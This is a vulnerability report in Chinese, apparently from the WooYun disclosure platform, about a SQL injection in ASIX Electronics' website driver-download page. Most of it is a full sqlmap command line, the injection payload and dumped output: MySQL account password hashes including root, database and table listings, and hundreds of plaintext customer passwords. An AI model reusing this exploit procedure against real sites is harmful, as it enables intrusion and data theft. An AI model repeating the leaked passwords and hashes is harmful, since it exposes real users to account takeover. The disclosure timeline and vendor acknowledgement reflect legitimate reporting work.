漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:ASIX Electronics主站存在SQL注射漏洞(DBA权限+root密码+系统管理密码+大量用户明文密码)(臺灣地區)
提交时间:2015-12-03 11:28
修复时间:2016-01-21 01:00
公开时间:2016-01-21 01:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
Tags标签:
无
漏洞详情 披露状态:
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
简要描述: ASIX Electronics Corporation is a leading fabless semiconductor supplier with focus on networking, communication and connectivity applications. ASIX was founded in May 1995 in Hsinchu Science Park, Taiwan, and has been listed on Taiwan OTC Stock Exchange (TAIEX code 3169) since November 2009. ASIX's customers include those companies with premium brand name in the networking and communication industries. ASIX works closely with the leaders in the networking industry to provide highly integrated solution for customer applications. ASIX has been certified as an ISO 9001 and 14001 suppliers. This achievement represents our continuing commitment to maintain a world-class quality system.
详细说明: 地址:http://**.**.**.**/cs/download.php?sub=driverdetail&PItemID=105
$ python sqlmap.py -u "http://**.**.**.**/cs/download.php?sub=driverdetail&PItemID=105" -p PItemID --technique=B --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
current user: 'asix@localhost' current user is DBA: True database management system users [3]: [*] 'asix'@'localhost' [*] 'root'@'localhost' [*] 'round'@'localhost' database management system users password hashes: [*] asix [1]: password hash: *54133694BC32EB47844334CC51FAA832D00B1350 [*] root [1]: password hash: *1BB84E0F9BA7E39468E5D323618432482F1915DA [*] round [1]: password hash: *40FDFCC21D2DA426E049E9A312DE2AB617E358CE
Database: CDB_ASIX Table: Asix_shop_member [353 entries] +------------------+ | MemPasswd | +------------------+ | !!Sunny1 | | !Pa55w0rd | | $pace00005 | | 006120abc | | 011angelfkwlsejr | | 0313033 | | 08931ro-31FDaq | | 123456 | | 123456 | | 123456 | | 12345678 | | 12345678qwe+ | | 123joe123 | | 189252 | | 19Ayers54# | | 19Ayers54$ | | 19dfi2fiaX | | 1fasixf1 | | 1Marvin | | 1nrt090 | | 1q2w3e4r | | 1st@nbul | | 1standpark | | 23303331 | | 25031990 | | 26102610 | | 27096963 | | 28112008 | | 2819182 | | 2jplm2 | | 55121812 | | 576985 | | 6007095307 | | 628Skogl | | 713803 |
漏洞证明:
--- Parameter: PItemID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sub=driverdetail&PItemID=105 AND 9968=9968 --- web server operating system: FreeBSD web application technology: PHP 5.4.28, Apache 2.2.27 back-end DBMS: MySQL >= 5.0.0 current user: 'asix@localhost' current user is DBA: True database management system users [3]: [*] 'asix'@'localhost' [*] 'root'@'localhost' [*] 'round'@'localhost' database management system users password hashes: [*] asix [1]: password hash: *54133694BC32EB47844334CC51FAA832D00B1350 [*] root [1]: password hash: *1BB84E0F9BA7E39468E5D323618432482F1915DA [*] round [1]: password hash: *40FDFCC21D2DA426E049E9A312DE2AB617E358CE Database: CDB_ASIX +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | Asix_shop_cart | 14858 | | Asix_Reg_Member | 11784 | | Asix_product_Item_Feature | 2711 | | Asix_Reg_Filter | 1785 | | Asix_request | 1593 | | Asix_product_Item_app | 1080 | | Asix_shop_cart_checksum | 810 | | Asix_product_Item_faq | 694 | | Asix_product_Item_driver | 550 | | Asix_shop_result | 446 | | Asix_shop_member | 353 | | Asix_news_publish | 260 | | Asix_shop_errorcode | 255 | | Asix_product_Item_driver_OSkind | 238 | | Asix_Reg_Country | 232 | | Asix_product_Item_datasheet | 164 | | Asix_product_Item_brief | 137 | | Asix_product_Item | 136 | | Asix_product_Item_support_report | 126 | | Asix_product_Item_application | 106 | | Asix_news_publish_alias | 99 | | Asix_distributor | 77 | | Asix_shop_country | 76 | | Asix_product_Item_support_gerber | 62 | | Asix_shop_product | 60 | | Asix_product_Item_support_utility | 58 | | Asix_product_Item_support_protocol | 56 | | Asix_product_Item_Layout | 51 | | Asix_product_Item_support_design | 49 | | Asix_product_Item_support_IBIS | 45 | | Asix_product_Item_support_firmware | 44 | | Asix_product_Item_support_BOM | 41 | | Asix_product_Item_DB | 37 | | Asix_shop_country_ship_weight | 36 | | Asix_news_publish_source | 31 | | Asix_news | 29 | | Asix_distributor_territory | 28 | | Asix_product_Item_support_guide | 28 | | Asix_product_Item_support_PCB | 26 | | Asix_distributor_sub_territory | 20 | | Asix_product_Series | 19 | | Asix_product_Item_HotPicture | 16 | | Asix_product_Item_support_gerber_notes | 16 | | Asix_product_Item_photo | 14 | | Asix_product_Item_Driver_Notes | 13 | | Asix_shop_country_ship | 12 | | Asix_product_Item_Attach | 10 | | Asix_product_Item_guide | 9 | | Asix_product_Item_support_kit | 8 | | Asix_request_product | 8 | | Asix_product_Line | 7 | | Asix_product_SubSeries | 7 | | Asix_product_Item_status | 5 | | Asix_distributor_area | 4 | | Asix_product_Item_faq_cate | 4 | | Asix_product_Item_Video | 4 | | Asix_shop_product_line | 4 | | Asix_product_Item_DB_Status | 3 | | Asix_distributor_corporate | 2 | | Asix_shop_category | 2 | | Asix_shop_exchange | 1 | | Asix_website_hit | 1 | +----------------------------------------+---------+ Database: performance_schema +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | setup_consumers | 8 | | performance_timers | 5 | | setup_timers | 1 | +----------------------------------------+---------+ Database: MYSPAM +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | myspam_filter | 1 | +----------------------------------------+---------+ Database: roundcubemail +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | identities | 36 | | users | 36 | | `session` | 18 | | contacts | 2 | | system | 1 | +----------------------------------------+---------+ Database: mysql +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | help_relation | 726 | | help_topic | 458 | | help_keyword | 378 | | help_category | 36 | | `user` | 3 | | proxies_priv | 1 | +----------------------------------------+---------+ Database: test +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | Asix_news_publish_alias | 46 | +----------------------------------------+---------+ Database: CDB_ASIX_CS +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | Asix_product_Item_Feature | 2633 | | Asix_product_Item_app | 1079 | | Asix_Reg_Filter | 941 | | Asix_request | 595 | | Asix_product_Item_faq | 474 | | Asix_news_publish | 263 | | Asix_Reg_Country | 232 | | Asix_product_Item | 136 | | Asix_product_Item_brief | 135 | | Asix_news_publish_alias | 101 | | Asix_product_Item_driver | 87 | | Asix_distributor | 77 | | Asix_product_Item_driver_OSkind | 51 | | Asix_news | 35 | | Asix_news_publish_source | 32 | | Asix_product_Item_application | 31 | | Asix_distributor_territory | 28 | | Asix_distributor_sub_territory | 20 | | Asix_product_Item_DB | 20 | | Asix_product_Series | 19 | | Asix_product_Item_datasheet | 16 | | Asix_product_Item_Layout | 15 | | Asix_product_Item_HotPicture | 14 | | Asix_product_Item_photo | 14 | | Asix_product_Item_Driver_Notes | 11 | | Asix_product_Item_Attach | 10 | | Asix_product_Item_guide | 9 | | Asix_request_product | 8 | | Asix_product_Line | 7 | | Asix_product_SubSeries | 7 | | Asix_product_Item_status | 5 | | Asix_distributor_area | 4 | | Asix_product_Item_faq_cate | 4 | | Asix_product_Item_Video | 4 | | Asix_distributor_corporate | 2 | | Asix_product_Item_DB_Status | 2 | | Asix_website_hit | 1 | +----------------------------------------+---------+ Database: CDB_ASIX_CT +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | Asix_product_Item_Feature | 2629 | | Asix_product_Item_app | 1079 | | Asix_Reg_Filter | 941 | | Asix_request | 503 | | Asix_product_Item_faq | 473 | | Asix_news_publish | 262 | | Asix_Reg_Country | 232 | | Asix_product_Item | 136 | | Asix_product_Item_brief | 135 | | Asix_news_publish_alias | 101 | | Asix_product_Item_driver | 87 | | Asix_distributor | 77 | | Asix_product_Item_driver_OSkind | 51 | | Asix_news | 35 | | Asix_news_publish_source | 32 | | Asix_product_Item_application | 31 | | Asix_distributor_territory | 28 | | Asix_distributor_sub_territory | 20 | | Asix_product_Item_DB | 20 | | Asix_product_Series | 20 | | Asix_product_Item_datasheet | 16 | | Asix_product_Item_Layout | 15 | | Asix_product_Item_HotPicture | 14 | | Asix_product_Item_photo | 14 | | Asix_product_Item_Driver_Notes | 11 | | Asix_product_Item_Attach | 10 | | Asix_product_Item_guide | 9 | | Asix_request_product | 8 | | Asix_product_Line | 7 | | Asix_product_SubSeries | 7 | | Asix_product_Item_status | 5 | | Asix_distributor_area | 4 | | Asix_product_Item_faq_cate | 4 | | Asix_product_Item_Video | 4 | | Asix_distributor_corporate | 2 | | Asix_product_Item_DB_Status | 2 | | Asix_website_hit | 1 | +----------------------------------------+---------+ Database: information_schema +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | INNODB_BUFFER_PAGE | 8192 | | COLUMNS | 3394 | | INNODB_BUFFER_PAGE_LRU | 478 | | STATISTICS | 464 | | KEY_COLUMN_USAGE | 423 | | PARTITIONS | 371 | | TABLE_CONSTRAINTS | 371 | | TABLES | 371 | | SESSION_VARIABLES | 329 | | GLOBAL_VARIABLES | 317 | | GLOBAL_STATUS | 312 | | SESSION_STATUS | 312 | | COLLATION_CHARACTER_SET_APPLICABILITY | 197 | | COLLATIONS | 197 | | USER_PRIVILEGES | 84 | | CHARACTER_SETS | 39 | | PLUGINS | 20 | | PROCESSLIST | 14 | | SCHEMATA | 13 | | REFERENTIAL_CONSTRAINTS | 11 | | ENGINES | 6 | | INNODB_CMP | 5 | | INNODB_CMP_RESET | 5 | | INNODB_CMPMEM | 5 | | INNODB_CMPMEM_RESET | 5 | | INNODB_BUFFER_POOL_STATS | 1 | +----------------------------------------+---------+ columns LIKE 'pass' were found in the following databases: Database: CDB_ASIX Table: Asix_shop_member [1 column] +-----------+ | Column | +-----------+ | MemPasswd | +-----------+ Database: CDB_ASIX Table: Asix_Reg_Member [1 column] +-----------+ | Column | +-----------+ | MemPasswd | +-----------+ Database: mysql Table: user [1 column] +----------+ | Column | +----------+ | Password | +----------+ Database: mysql Table: servers [1 column] +----------+ | Column | +----------+ | Password | +----------+ Database: CDB_ASIX Table: Asix_shop_member [353 entries] +------------------+ | MemPasswd | +------------------+ | !!Sunny1 | | !Pa55w0rd | | $pace00005 | | 006120abc | | 011angelfkwlsejr | | 0313033 | | 08931ro-31FDaq | | 123456 | | 123456 | | 123456 | | 12345678 | | 12345678qwe+ | | 123joe123 | | 189252 | | 19Ayers54# | | 19Ayers54$ | | 19dfi2fiaX | | 1fasixf1 | | 1Marvin | | 1nrt090 | | 1q2w3e4r | | 1st@nbul | | 1standpark | | 23303331 | | 25031990 | | 26102610 | | 27096963 | | 28112008 | | 2819182 | | 2jplm2 | | 55121812 | | 576985 | | 6007095307 | | 628Skogl | | 713803 | | 745751mv | | 745751mv | | 7600C200 | | 76komissarov34 | | 7d1-4Rt9 | | 821914 | | 8250.8564 | | 8506110899 | | 8BA46n | | @Set1472set | | accxjg92mm | | ahk0314 | | Airgasrd12 | | alcoking@1212 | | alkinc01 | | Alveena2007 | | angelika63 | | anhlha01 | | animissa | | anjusree | | annie1 | | apbeta14 | | Aphysci | | ariffin89 | | armela01 | | Arrival01 | | asd123 | | asix0606 | | asix1126 | | asix1982 | | asix2002 | | asix2284 | | asix3169 | | asix45 | | asix4choe | | asix4choe | | asixanne1955 | | Asixblah12!@ | | asixGriffin | | asixgsti | | asixjsm | | AsixKwon88: | | asixshopping | | at89c55 | | Aud1oV1sual | | AUTELSISTEMS | | avtechuk1 | | aware1234 | | Axfonclbr | | axis_mh070477 | | bc732abc | | beta23 | | BIBENDUM | | biggulp | | blueskye | | boschrtc | | bruckdorf1 | | Bruker | | bttech | | buz!!g00 | | byrddrive | | byrddrive | | c3incc3inc | | calim123 | | calim123 | | carmine | | cbf390 | | ccmiro | | cecilia | | celtascortos | | chemigraphic | | Cmp0306! | | coala9488 | | concord64j | | concord64j | | coolumair85.. | | coppermine | | coreco | | cv55ui14 | | cyw445800 | | daeseung3388 | | dan3197 | | danai123 | | dataman | | dave1234 | | deadletters | | deindia123 | | designshift1 | | devex251210 | | dgl33ve | | digitech | | DO | | dpmdoc | | ducati996 | | dutch1954 | | ebherira | | efitronix | | ELA3mustafa | | elettronica | | elosaku | | elsat1468 | | esmart2012 | | Extra300l | | fiction | | flex.100% | | fourtvir69 | | frankfurt23 | | frogleg | | Gandalf3261 | | GEMINIJONESY | | ggtech36668656 | | ghbotnvb | | gkdanr | | gosun123 | | Gramsci1320 | | grd251405 | | grosys63633 | | guliverkel | | hanasix | | hanhan | | hawk$worth | | Hb!$638g&9aJJg! | | hejAsix1 | | hmitditw | | hostalbin | | iag123 | | icd001 | | Icomera75 | | IcTl4285 | | Ii4reequ | | Inglewood | | innocmo | | innovaspa | | int5705 | | ipdoor | | itis4asix | | J1mb21 | | jamay5168 | | Jana2729 | | jane123 | | jelwicka | | joyiwoebay | | joyiwoebay | | joyiwoebay | | Juniper | | jurasek | | Jwp4000 | | kalasi | | kbs3025 | | killroy21 | | kimsc0514 | | kizero | | kj94483 | | kmci30dg | | kmd8383 | | kpgdwill25 | | kr6995 | | kr6995 | | ksw1507 | | kulvinder | | kwchin | | lalm0172 | | lauren1994 | | line123 | | lmp300 | | lobster | | Lopamiro.123 | | lynnprod58 | | mamhlad | | Marceta12 | | mast51-boohoo | | matrox | | mayada7985 | | MCS9990 | | mdcom248 | | metall666 | | mgl6866 | | miked1 | | miltope | | miltope | | mis000 | | mmmddd | | mp100dia | | msdn2k | | myasix4me | | mydi3344527 | | NAC123 | | namatek | | neatsettembre | | needchips | | nescafepal | | networks1987 | | NevoTeam | | news225 | | news225 | | normyy | | Nottrustedsite | | Novo0988 | | nssceec | | nyce2011 | | NZPXZRKL | | og1purch | | olio22 | | olympusndt | | opelcorsa | | osamakazuika | | Oshieg&3g2uikGU3 | | pa55w0rd | | packzhu1962 | | Palmerston | | PAMELA116 | | parallel | | Password | | PeterPetersen | | pgjasix | | phantom1 | | phantom1 | | pisutt | | plavi9 | | pnlabd3511 | | powersoft19 | | ppppp1 | | pravda | | precidia1 | | precious | | prince8888 | | prodys123 | | PTINOVACAO | | pulson1c | | pulson1c | | Pulsonic | | puyh20111101 | | QFLCt25yDqj6d | | qpswkals79 | | QSIC6720 | | quartics1 | | qw123qw123 | | Qw3rty | | ranchelieu143 | | rbdlf0502 | | Ready2go | | ribs<usc | | riccardo | | rkeldjs2020 | | RKNlove | | rnj1311 | | rolltide | | rover214 | | rtirti | | RtoS12 | | ruJZl0MP | | Rush2!!2 | | s3cr3t | | s3nTmatte | | sairam | | Sallyann1 | | sanyo67 | | scm33273 | | Scutum1+ | | sebaek100 | | Secure_01 | | selincuneo | | sitepitalia | | sm1ley | | smc123 | | smt4211 | | snm1508 | | Snow(Bird0) | | soK22% | | Space001 | | SPACEMAN | | speedy99 | | spring38 | | stc4macs | | stellars | | stre@mbox | | sunsunsun | | sunwoo | | syko1990 | | Tbnsh11rFUfz | | technologies | | TekPartner | | Tennis44 | | tequila | | test1111 | | test1111 | | tianzigang1 | | tibnor768 | | tinytag101 | | tinytag101 | | tjsrud1 | | toyo123 | | tvace598 | | tvp5150 | | umayal |
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 危害等级:高
漏洞Rank:18
确认时间:2015-12-07 00:55
厂商回复: 感謝通報
最新状态: 2016-02-20:HITCON 於接獲通報後 email 該網站所示之服務信箱,至漏洞公開時仍無回應。